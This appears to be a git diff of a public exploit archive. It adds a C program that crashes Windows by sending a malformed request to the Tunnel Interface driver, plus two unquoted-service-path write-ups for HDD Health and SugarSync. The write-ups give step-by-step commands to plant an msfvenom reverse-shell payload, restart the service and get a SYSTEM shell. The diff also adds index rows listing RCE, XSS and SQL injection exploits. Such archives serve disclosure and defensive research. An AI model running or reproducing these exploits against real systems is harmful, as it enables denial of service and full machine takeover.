 00000150  6C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00  l. .A.d.d.r.e.s.
 00000160  73 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00  s.e.s...........
 And save the file.
 4.- Go to File -> Restore program options...
 5.- The application "sm.exe" crash.
--- a/exploits/windows/dos/51114.c
+++ b/exploits/windows/dos/51114.c
@ -0,0 +1,48 @@
 // Exploit Title: Tunnel Interface Driver - Denial of Service
 // Date: 07/15/2022
 // Exploit Author: ExAllocatePool2
 // Vendor Homepage: https://www.microsoft.com/
 // Software Link: https://www.microsoft.com/en-us/software-download/windows10
 // Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
 // Tested on: Microsoft Windows
 // GitHub Repository: https://github.com/Exploitables/MSRC-1
 #include <Windows.h>
 #include <stdio.h>
 #define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"
 int main(int argc, char** argv);
 int main(int argc, char** argv)
 {
 	HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
 	unsigned long long input_output = 0x4242424242424242;
 	unsigned long bytes_returned = 0x43434343;
 	unsigned char unused = 0;
 	SetConsoleTitleA("https://msrc.microsoft.com/");
 	printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");
 	if (h_driver == (HANDLE)-1)
 	{
 		printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
 		unused = getchar();
 		return 1;
 	}
 	printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);
 	printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
 	for (int i = 2; i > 0; i--)
 	{
 		Sleep(1000);
 		printf("\n[!] %d...", i);
 	}
 	DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);
 	unused = getchar();
 	printf("\n[-] Exploit failed. The machine should have crashed.");
 	return 0;
 }
--- a/exploits/windows/local/51105.txt
+++ b/exploits/windows/local/51105.txt
@ -0,0 +1,66 @@
 # Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
 # Exploit Author: Jorge Manuel Lozano Gómez
 # Date: 2022-10-19
 # Vendor Homepage: https://www.panterasoft.com
 # Software Link: https://hdd-health.softonic.com
 # Version : 4.2.0.112
 # Tested on: Windows 11 64bit
 # CVE : N/A
 About Unquoted Service Path :
 ==============================
 When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
 (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
 Description:
 ==============================
 HDD Health installs a service with an unquoted service path.
 To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
 Upon service restart or system reboot, the malicious code will be run with elevated privileges.
 # PoC
 ===========
 1.  Open CMD and check for the vulnerability by typing 	[ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
 2.  The vulnerable service would show up.
 3.  Check the service permissions by typing 	[ sc qc "HDDHealth" ]
 4.  The command would return..
        C:\>sc qc "HDDHealth"
        [SC] QueryServiceConfig SUCCESS
        SERVICE_NAME: HDDHealth
                TYPE               : 10  WIN32_OWN_PROCESS
                START_TYPE         : 2   AUTO_START
                ERROR_CONTROL      : 0   IGNORE
                BINARY_PATH_NAME   : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
                LOAD_ORDER_GROUP   :
                TAG                : 0
                ISPLAY_NAME        : HDDHealth
                DEPENDENCIES       :
                SERVICE_START_NAME : LocalSystem
 5.  This concludes that the service is running as SYSTEM.
 6.  Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe.
 7.  Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory.
 8.  Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
 9.  Start a listener.
 9.  Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
 9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
 10. Got shell.
 During my testing :
 Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe
 # Disclaimer
 =============
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
 The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
--- a/exploits/windows/local/51106.txt
+++ b/exploits/windows/local/51106.txt
@ -0,0 +1,66 @@
 # Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
 # Exploit Author: Jorge Manuel Lozano Gómez
 # Date: 2022-10-20
 # Vendor Homepage: https://www1.sugarsync.com
 # Software Link: https://www1.sugarsync.com/apps/windows/
 # Version : 4.1.3
 # Tested on: Windows 11 64bit
 # CVE : N/A
 About Unquoted Service Path :
 ==============================
 When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
 (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
 Description:
 ==============================
 SugarSync installs a service with an unquoted service path.
 To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
 Upon service restart or system reboot, the malicious code will be run with elevated privileges.
 # PoC
 ===========
 1.  Open CMD and check for the vulnerability by typing 	[ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
 2.  The vulnerable service would show up.
 3.  Check the service permissions by typing 	[ sc qc "SugarSync Service" ]
 4.  The command would return..
        C:\>sc qc "SugarSync Service"
        [SC] QueryServiceConfig SUCCESS
        SERVICE_NAME: SugarSync Service
                TYPE               : 10  WIN32_OWN_PROCESS
                START_TYPE         : 2   AUTO_START
                ERROR_CONTROL      : 1   NORMAL
                BINARY_PATH_NAME   : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
                LOAD_ORDER_GROUP   :
                TAG                : 0
                ISPLAY_NAME        : SugarSync Service
                DEPENDENCIES       :
                SERVICE_START_NAME : LocalSystem
 5.  This concludes that the service is running as SYSTEM.
 6.  Now create a payload with msfvenom or other tools and name it to SugarSyncSvc.exe.
 7.  Make sure you have write permissions to "C:\Program Files (x86)\SugarSync" directory.
 8.  Provided that you have right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory.
 9.  Start a listener.
 9.  Now restart the SugarSync service by giving coommand [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ]
 9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
 10. Got shell.
 During my testing :
 Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe
 # Disclaimer
 =============
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
 The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -1831,6 +1831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,,
 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,,
 41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,,
 51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,,
 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,,
 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,,
 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,,
@ -3851,6 +3852,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware,,2020-05-25,2020-05-25,1,CVE-2017-15889,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
 43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,,2018-01-15,2018-01-15,1,,,,,,
 16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",remote,hardware,,2011-02-02,2011-02-02,1,CVE-2011-0354;OSVDB-68309,,,,,
 51107,exploits/hardware/remote/51107.txt,"Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access",2023-03-28,dsclee1,remote,hardware,,2023-03-28,2023-03-28,0,CVE-2022-37255,,,,,
 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,,2018-05-03,2018-05-03,0,CVE-2018-9995,,,,,https://github.com/ezelf/CVE-2018-9995_dvr_credentials/blob/529a711e3db8c7265473bf122276fb295e5b973d/getDVR_Credentials.py
 43384,exploits/hardware/remote/43384.py,"Technicolor DPC3928SL - SNMP Authentication Bypass",2017-05-05,nixawk,remote,hardware,,2017-12-21,2017-12-21,0,CVE-2017-5135,,Stringbleed,,,https://github.com/nixawk/labs/blob/47d72af5b69bd4d2ec411b38313d33111a063c97/CVE-2017-5135/StringBleed-CVE-2017-5135.py
 35620,exploits/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",remote,hardware,,2011-04-15,2014-12-26,1,,,,,,https://www.securityfocus.com/bid/47390/info
@ -5824,6 +5826,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37272,exploits/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,jsp,8080,2015-06-12,2016-10-10,1,CVE-2015-7347;CVE-2015-7346;OSVDB-123320;OSVDB-123319;OSVDB-123318,,,,http://www.exploit-db.comZCMS_1.1.zip,
 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"XML External Entity (XXE)",,,,
 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,,2019-06-05,2019-06-05,0,CVE-2019-9621,"Server-Side Request Forgery (SSRF)",,,,
 51112,exploits/jsp/webapps/51112.txt,"ZKTeco ZEM/ZMM 8.88 - Missing Authentication",2023-03-28,"RedTeam Pentesting GmbH",webapps,jsp,,2023-03-28,2023-03-28,0,CVE-2022-42953,,,,,
 40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
 40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,webapps,jsp,,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
 40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,webapps,jsp,8088,2016-08-31,2016-08-31,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
@ -10732,6 +10735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6577/info
 22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6575/info
 22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,remote,multiple,,2003-01-10,2012-10-21,1,,,,,,https://www.securityfocus.com/bid/6578/info
 51117,exploits/multiple/remote/51117.txt,"Hashicorp Consul v1.0 - Remote Command Execution (RCE)",2023-03-28,GatoGamer1155,remote,multiple,,2023-03-28,2023-03-28,0,,,,,,
 35092,exploits/multiple/remote/35092.html,"Helix Server 14.0.1.571 - Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",remote,multiple,,2010-12-10,2014-10-28,1,,,,,,https://www.securityfocus.com/bid/45340/info
 23600,exploits/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",remote,multiple,,2004-01-26,2016-09-06,1,CVE-2004-2113;OSVDB-3754,,,,,https://www.securityfocus.com/bid/9491/info
 48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,,2020-06-10,2020-06-10,0,,,,,,
@ -11384,6 +11388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
 1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
 51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
 25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",remote,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1077;OSVDB-15634,,,,,https://www.securityfocus.com/bid/13127/info
 33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,remote,multiple,,2009-06-10,2017-01-06,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37997/info
 38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple,,2015-12-14,2017-11-02,1,,"Metasploit Framework (MSF)",,,,
@ -11882,6 +11887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",webapps,multiple,,2017-04-25,2017-04-25,0,CVE-2017-7221,,,,,
 43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple,,2017-10-17,2017-10-17,0,CVE-2017-15276,,,,,
 37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",webapps,multiple,80,2015-06-12,2015-06-12,0,CVE-2015-4420;OSVDB-123307;OSVDB-123306;OSVDB-123305,,,,,
 51113,exploits/multiple/webapps/51113.py,"OPSWAT Metadefender Core - Privilege Escalation",2023-03-28,"Ulascan Yildirim",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-32272,,,,,
 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,,2021-01-20,2021-01-20,0,,,,,,
 10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,webapps,multiple,,2009-12-13,,1,,,,,,
 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,,2021-07-29,2021-07-29,0,,,,,,
@ -11908,6 +11914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
 51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
 42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,,
 33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info
 50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,,
@ -14458,6 +14465,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,,
 49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,,
 48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,,
 51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,,
 17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,,
 26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3953;OSVDB-21174,,,,,https://www.securityfocus.com/bid/15583/info
@ -14848,6 +14856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php,,2010-04-26,,1,,,,,,
 26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4375;OSVDB-21821,,,,,https://www.securityfocus.com/bid/15936/info
 30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php,,2013-12-06,2013-12-06,0,OSVDB-100746,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php
 51108,exploits/php/webapps/51108.txt,"BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",2023-03-28,zetc0de,webapps,php,,2023-03-28,2023-03-28,0,CVE-2022-3552,,,,,
 41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php,,2017-01-17,2017-01-17,0,,,,,http://www.exploit-db.comBoZoN-master.zip,
 7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php,,2009-01-29,,1,OSVDB-51725;OSVDB-51724,,,,,
 9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,CVE-2009-3500;OSVDB-58297;OSVDB-58296,,,,,
@ -19392,6 +19401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",webapps,php,,2007-07-11,2013-12-15,1,,,,,,https://www.securityfocus.com/bid/24864/info
 37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,webapps,php,,2012-08-27,2016-12-18,1,CVE-2012-0744;OSVDB-84917,,,,,https://www.securityfocus.com/bid/55125/info
 32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php,,2014-03-26,2014-03-26,0,CVE-2013-6719;OSVDB-104072;CVE-2013-6720,,,,,
 51119,exploits/php/webapps/51119.txt,"iBooking v1.0.8 - Arbitrary File Upload",2023-03-28,d1z1n370/oPty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php,,2010-06-19,,1,OSVDB-76887;CVE-2010-5020;CVE-2010-0804;OSVDB-62681,,,,,
 6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48127;CVE-2008-4354,,,,,
 19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",webapps,php,,2012-07-20,2016-12-22,0,OSVDB-84391,,,,,http://secpod.org/advisories/SecPod_NetArt_Media_iBoutique_SQLi_Vuln.txt
@ -20132,6 +20142,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",webapps,php,,2007-05-15,2013-12-05,1,CVE-2007-1898;OSVDB-34088,,,,,https://www.securityfocus.com/bid/23989/info
 6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,webapps,php,,2008-09-23,,1,OSVDB-51677;CVE-2008-5992;OSVDB-51676;OSVDB-48554;OSVDB-48553,,,,,
 6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,webapps,php,,2008-09-22,2016-12-22,1,OSVDB-48518;CVE-2008-6401,,,,,
 51104,exploits/php/webapps/51104.txt,"Jetpack 11.4 - Cross Site Scripting (XSS)",2023-03-28,"Behrouz Mansoori",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24494,,,,,https://www.securityfocus.com/bid/17449/info
 27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24492,,,,,https://www.securityfocus.com/bid/17449/info
 27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24493,,,,,https://www.securityfocus.com/bid/17449/info
@ -23275,6 +23286,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],webapps,php,,2004-07-13,2013-01-21,1,CVE-2004-0725;OSVDB-7865,,,,,https://www.securityfocus.com/bid/10718/info
 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,"Cross-Site Scripting (XSS)",,,,
 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,Traversal,,,,
 51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
@ -24501,6 +24513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
